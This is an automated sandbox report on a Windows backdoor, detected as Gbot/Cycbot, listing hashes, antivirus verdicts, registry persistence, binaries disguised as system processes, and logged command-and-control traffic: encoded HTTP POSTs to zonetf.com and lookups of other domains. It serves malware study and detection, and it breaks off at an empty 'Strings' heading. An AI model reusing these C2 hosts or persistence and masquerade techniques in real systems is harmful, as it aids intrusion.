Analysis Date: 2014-12-06 03:05:57
MD5: 33bfcc3c8f04d3a9477e3fcb3491c01a
SHA1: 3e9009cb27ac6326ab26a6bcf05ba39bd3d1eb07

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text md5: 7b4b0a57c796606b7528249fc10a1f87 sha1: 8fafc9f8a1db365452ff399fe5cda1dc497a20fc size: 103936
Section .rdata md5: 09b676466ee46af3533301059149c32c sha1: a93bcef124f96ee2364e97922385c2ba4a7fd601 size: 2048
Section .data md5: d8a0a74d5f6c2c9e6e40332239c8d8d1 sha1: 1c21fc85b5eec8635c22921568096913ca8e1d88 size: 59392
Section .isete md5: 49d047c7610da3ee10d0d5d18bdb2a29 sha1: f861947bf08134996b802fc9d5f43d25a83b231b size: 1024
Timestamp: 2005-09-16 17:19:30
Version: ProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1107
PEhash: a06fc83ab5051daf537caeeb83e07db82dd8ca30
IMPhash: a26cfff4f4121ecc6cb48335285ff9eb
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.G.gen!Eldorado
AV Avira (antivir): BDS/Gbot.aida
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/Diple.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-316
AV Dr. Web: BackDoor.Gbot.34
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.LZI
AV Fortinet: W32/FraudLoad.MK!tr
AV Frisk (f-prot): W32/Goolbot.G.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Grisoft (avg): Cryptic.CMZ
AV Ikarus: Backdoor.Win32.Gbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.aid
AV MalwareBytes: Trojan.Agent
AV Mcafee: BackDoor-EXI.gen.i
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen3
AV Trend Micro: BKDR_CYCBOT.SMX
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS 127.0.0.1
Winsock DNS myaquashoponline.com
Winsock DNS lostpropaganda.net
Winsock DNS moremobileringtons.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS zonetf.com
Type: A
141.8.225.80
DNS zonetf.com
Type: A
141.8.225.80
DNS lostpropaganda.net
Type: A
DNS myaquashoponline.com
Type: A
DNS moremobileringtons.com
Type: A
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNwlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP 192.168.1.1:1035 ➝ 141.8.225.80:80

Strings